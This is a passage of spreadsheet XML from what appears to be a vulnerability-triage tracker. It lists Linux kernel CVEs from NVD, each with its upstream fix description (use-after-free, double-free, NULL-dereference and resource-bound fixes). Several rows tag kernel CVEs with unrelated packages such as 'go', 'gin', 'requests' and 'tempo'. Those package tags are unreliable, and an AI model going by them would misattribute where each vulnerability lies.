      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q522" s="5" t="inlineStr"/>
      <c r="R522" s="5" t="inlineStr"/>
      <c r="S522" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf: RISC-V: store available counter mask as bitmap
The available-counter mask was a single unsigned long, but iteration
uses RISCV_MAX_COUNTERS, which is 64. On RV32 that reads past the object.
Filling with an unsigned-long bit at index 32 and above is also wrong.
Use DECLARE_BITMAP and set_bit/bitmap helpers. Walk each bitmap word
into CFG_MATCH when checking events, when allocating an index, and when
stopping all counters. Set the counter base to i times BITS_PER_LONG.
Share the CFG_MATCH ecall through a small helper so the 32-bit argument
split is not duplicated. On qemu-system-riscv32 the probe bitmap has bits
above XLEN set, so the first word alone is not enough.
[pjw@kernel.org: updated to apply; fixed checkpatch.pl issues]</t>
        </is>
      </c>
      <c r="T522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97587</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97588</t>
        </is>
      </c>
      <c r="D523" s="5" t="inlineStr"/>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="inlineStr"/>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr"/>
      <c r="S523" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Map EBUSY to EIO when key conversion fails repeatedly
When hardware persistently returns -EBUSY after exhausting retries,
the error propagates to crypto_finalize_*_request(). The crypto API's
completion wrapper treats -EBUSY as a queueing status and swallows it,
preventing the completion callback from firing. This causes callers
using crypto_wait_req() to block indefinitely.
Translate persistent -EBUSY to -EIO after retry exhaustion to ensure
proper error propagation and callback invocation.</t>
        </is>
      </c>
      <c r="T523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97588</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97590</t>
        </is>
      </c>
      <c r="D524" s="5" t="inlineStr"/>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="inlineStr"/>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr"/>
      <c r="S524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix missing scrub of temp buffers with PAES algorithm
In function ctr_paes_do_crypt() there is a buffer used to process
remaining bytes &lt; AES_BLOCK_SIZE. This buffer was not scrubbed and
thus could lead to expose of unwanted data. Rework the code to
explicitly scrub the buffer at the end of the function to avoid
exposure of maybe sensitive data.
In function __xts_2keys_prep_param() change the existing scrub to
clean the whole param block instead of just the key field.</t>
        </is>
      </c>
      <c r="T524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97590</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97591</t>
        </is>
      </c>
      <c r="D525" s="5" t="inlineStr"/>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="inlineStr"/>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr"/>
      <c r="S525" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix handling of EBUSY in PHMAC when req is pushed to crypto engine
When a request is transferred to the engine via
crypto_transfer_hash_request_to_engine() there are two return codes
signaling a successful transfer: EINPROGRESS and EBUSY. However the
correct handling of EBUSY was missing and has been added as a return
code indicating a successful transfer to the crypto engine.</t>
        </is>
      </c>
      <c r="T525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97591</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97592</t>
        </is>
      </c>
      <c r="D526" s="5" t="inlineStr"/>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="inlineStr"/>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr"/>
      <c r="S526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix missing scrub of temp buffers with AES ctr and gcm algorithm
In function ctr_aes_crypt() there is a buffer used to process
remaining bytes &lt; AES_BLOCK_SIZE. This buffer was not scrubbed and
thus could lead to expose of unwanted data. When the buffer is used
explicitly scrub it at the end of the code block to avoid exposure of
maybe sensitive data.
In a similar way the function gcm_aes_crypt() hat an error path where
the CPACF param block was not scrubbed. Instead of return early now
these error paths go to end of function where explicit scrubbing is
done. Similar with the buffers which are part of the gcm_sg_walk
structs from the variables gw_in and gw_out.</t>
        </is>
      </c>
      <c r="T526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97592</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97593</t>
        </is>
      </c>
      <c r="D527" s="5" t="inlineStr"/>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="inlineStr"/>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr"/>
      <c r="S527" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/s390: Fix NULL dereference in iova_to_phys() with ZPCI_TABLE_TYPE_RFX
When using a 5-level translation table via ZPCI_TABLE_TYPE_RFX
get_rso_from_iova() returns NULL when the region-first entry is invalid.
Yet in get_rto_from_iova() the region-second origin rso is not checked
to be non-NULL before accessing rso[rsx] leading to a NULL pointer
dereference instead of a NULL return when iova_to_phys() is called on
a unmapped IOVA. Fix this by adding the missing NULL check.</t>
        </is>
      </c>
      <c r="T527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97593</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97596</t>
        </is>
      </c>
      <c r="D528" s="5" t="inlineStr"/>
      <c r="E528" s="5" t="inlineStr"/>
      <c r="F528" s="5" t="inlineStr"/>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr"/>
      <c r="S528" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipvs: reject invalid states in connection template sync records
IPVS sync receivers validate protocol states before creating or updating a
connection. For connection templates, however, they only log states outside
the template state range and still store the value in the connection.
A template can be returned by ordinary connection lookup. TCP and SCTP then
use the invalid state as an index into their transition tables.
Reject invalid template states in both sync protocol versions before
looking up or modifying a connection. The version 1 path handles both
IPv4 and IPv6 records.</t>
        </is>
      </c>
      <c r="T528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97596</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97597</t>
        </is>
      </c>
      <c r="D529" s="5" t="inlineStr"/>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="inlineStr"/>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr"/>
      <c r="S529" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: flowlabel: cap duplicate leases per socket
ipv6_flowlabel_get() allocates an ipv6_fl_socklist entry for every
successful GET. The recheck path for a compatible existing flowlabel
links another lease without applying any lease admission check. Repeated
GET requests for one shareable label can therefore grow a socket's lease
list without bound.
Reject a new unprivileged lease once the socket already holds
FL_MAX_PER_SOCK leases. Check this on the shared recheck path so reuse
of a globally interned label, including the fl_intern() collision path,
is covered as well. New-label admission remains under the existing
mem_check() policy.
Use capable(CAP_NET_ADMIN) rather than ns_capable(), matching
mem_check(). An unprivileged user must not bypass the cap by creating a
user namespace and a netns where they have CAP_NET_ADMIN, which would
still consume host memory.
Check the capability only when the socket reaches the limit, so
successful unprivileged GET requests below the cap do not generate a
capability audit. Do the admission check before updating linger and
expires so a rejected GET does not refresh the shared label, matching
the existing socket-list allocation failure path.</t>
        </is>
      </c>
      <c r="T529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97597</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97598</t>
        </is>
      </c>
      <c r="D530" s="5" t="inlineStr"/>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="inlineStr"/>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr"/>
      <c r="S530" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv4: fib: bound automatic table ID allocation
fib_empty_table() probes every table ID from 1 until it finds a
free one.  IPv4 tables are stored in a 256-bucket hash table, so a
dense set of IDs makes each probe walk a growing hash chain while
RTNL is held.
Automatic table assignment ("ip rule ... table 0") is an IPv4-only
legacy path.  Bound the automatically allocated ID to 4096 so the
RTNL hold stays bounded, without changing lookups of explicitly
specified table IDs.
This changes user-visible behavior.  A table-0 rule previously
received the lowest free ID in 1..RT_TABLE_MAX (0xFFFFFFFF).  After
this patch the search stops at 4096 and the rule add fails with
ENOBUFS if that range is fully occupied.  Explicit table IDs above
4096 remain usable.
The automatic path is unused in practice: it is IPv4-only, not
documented by ip-rule, uncovered by kernel selftests, and both
NetworkManager and systemd refuse table 0.</t>
        </is>
      </c>
      <c r="T530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97598</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97599</t>
        </is>
      </c>
      <c r="D531" s="5" t="inlineStr"/>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="inlineStr"/>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr"/>
      <c r="S531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: hwsim: serialize pib updates to fix double-free
hwsim_update_pib() does an unserialized read-swap-free of phy-&gt;pib:
	pib_old = rtnl_dereference(phy-&gt;pib);
	...
	rcu_assign_pointer(phy-&gt;pib, pib);
	kfree_rcu(pib_old, rcu);
It assumes the RTNL is held, but -&gt;set_channel is not always called
under it: the mac802154 scan worker changes channels via
drv_set_channel() without the RTNL. Such an update can race an
RTNL-held one on the same phy; both read the same pib_old and both
kfree_rcu() it, double-freeing the object. With SLUB percpu sheaves
batching kfree_rcu(), this surfaces as a KASAN invalid-free in
rcu_free_sheaf().
struct hwsim_phy has no lock for pib. Add one and make the swap atomic
with rcu_replace_pointer() under it, dropping the misleading
rtnl_dereference().</t>
        </is>
      </c>
      <c r="T531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97599</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97600</t>
        </is>
      </c>
      <c r="D532" s="5" t="inlineStr"/>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="inlineStr"/>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr"/>
      <c r="S532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: cc2520: fix FIFOP work use-after-free
The FIFOP interrupt handler queues cc2520_fifop_irqwork.  On removal,
cc2520_remove() only flushes the work.  The devm-managed FIFOP IRQ
remains active until after -&gt;remove() returns and can queue the work
again after that flush, allowing it to run after the private data is
released.
Disable the work with disable_work_sync() instead of flushing it, so
the handler can no longer queue it once removal begins.  Destroy the
buffer mutex last, since the worker and the stop callback invoked
through ieee802154_unregister_hw() both take it.
Found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97600</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97601</t>
        </is>
      </c>
      <c r="D533" s="5" t="inlineStr"/>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="inlineStr"/>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr"/>
      <c r="S533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ieee802154: 6lowpan: fix NULL dereference in lowpan_newlink
TUNSETLINK allows a TUN device to change its link-layer type to
ARPHRD_IEEE802154 without initializing ieee802154_ptr. lowpan_newlink()
checks only the device type before dereferencing the pointer, so an
RTM_NEWLINK request can trigger a NULL pointer dereference.
Reject devices without ieee802154_ptr along with devices of the wrong type.</t>
        </is>
      </c>
      <c r="T533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97601</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97603</t>
        </is>
      </c>
      <c r="D534" s="5" t="inlineStr"/>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="inlineStr"/>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr"/>
      <c r="S534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
idpf: disable DIM work before freeing q_vectors
idpf never drains the Tx/Rx DIM works before freeing the memory they
live in.  tx_dim and rx_dim are embedded in struct idpf_q_vector, they
are queued from the NAPI poll via net_dim(), and idpf_vport_intr_rel()
ends with kfree(rsrc-&gt;q_vectors).  Nothing in the driver cancels them.
idpf_tx_dim_work() and idpf_rx_dim_work() then run on freed memory:
idpf_vport_intr_write_itr() writes the ITR register through
q_vector-&gt;intr_reg.tx_itr / rx_itr, void __iomem pointers loaded out of
the freed q_vector.  No configuration is needed to get there --
IDPF_ITR_IS_DYNAMIC() is defined as (itr_mode) and idpf_vport_alloc()
initialises both modes to IDPF_ITR_DYNAMIC.
Draining after idpf_vport_intr_napi_dis_all() is not enough on its own.
idpf_net_dim() is called from inside the
"if (napi_complete_done(napi, work_done))" branch of the poll, and
napi_complete_done() has already cleared NAPIF_STATE_SCHED by then.
napi_disable_locked() waits only while (val &amp; (NAPIF_STATE_SCHED |
NAPIF_STATE_NPSVC)), so napi_disable() can return while the poll tail is
still queueing the work, and a plain cancel_work_sync() would be
re-armed behind the drain.
Use disable_work_sync(): schedule_work() on a work with a non-zero
disable count is dropped by clear_pending_if_disabled() before
__queue_work() is reached.
Move idpf_init_dim() to idpf_vport_intr_alloc() so the works are
initialised on every path that can reach the drain -- the three
"goto intr_deinit" sites between idpf_vport_intr_init() and
idpf_vport_intr_ena() get there without the enable side having run.
Nothing re-enables them: rsrc-&gt;q_vectors is freed on every exit from
idpf_vport_open() and on every idpf_vport_stop(), so the count dies with
the object.
It is a race, not a deterministic failure -- net_dim() only schedules
once DIM_NEVENTS events have accumulated and the profile index changes.
A KASAN ifup/ifdown loop under load is the way to see it.</t>
        </is>
      </c>
      <c r="T534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97603</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97604</t>
        </is>
      </c>
      <c r="D535" s="5" t="inlineStr"/>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="inlineStr"/>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr"/>
      <c r="S535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: vfb: defer cleanup until the last reference
FBIOGETCMAP takes a shallow snapshot of info-&gt;cmap and performs the
usercopy after dropping info-&gt;lock. vfb_remove() frees the colormap
immediately after unregistering the framebuffer, even when an open file
still holds a reference to fb_info. A concurrent driver unbind can
therefore free the colormap while the ioctl copies it to userspace.
KASAN reports:
  BUG: KASAN: slab-use-after-free in _copy_to_user
  Read of size 512 by task poc/125
   _copy_to_user (./include/linux/instrumented.h:129 ./include/linux/uaccess.h:201 lib/usercopy.c:24)
   fb_cmap_to_user (./include/linux/uaccess.h:230 drivers/video/fbdev/core/fbcmap.c:211)
   do_fb_ioctl (drivers/video/fbdev/core/fb_chrdev.c:114)
   Allocated by task 1:
   fb_alloc_cmap_gfp (./include/linux/slab.h:973 ./include/linux/slab.h:1290 drivers/video/fbdev/core/fbcmap.c:108)
   vfb_probe (drivers/video/fbdev/vfb.c:459)
   Freed by task 124:
   fb_dealloc_cmap (drivers/video/fbdev/core/fbcmap.c:151)
   vfb_remove (drivers/video/fbdev/vfb.c:489)
unregister_framebuffer() drops the registration reference, and fbdev calls
fb_destroy after the last put_fb_info(). Move the registered framebuffer's
cleanup into an fb_destroy callback so its colormap and screen buffer stay
alive until all file references have been released.</t>
        </is>
      </c>
      <c r="T535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97604</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97605</t>
        </is>
      </c>
      <c r="D536" s="5" t="inlineStr"/>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="inlineStr"/>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
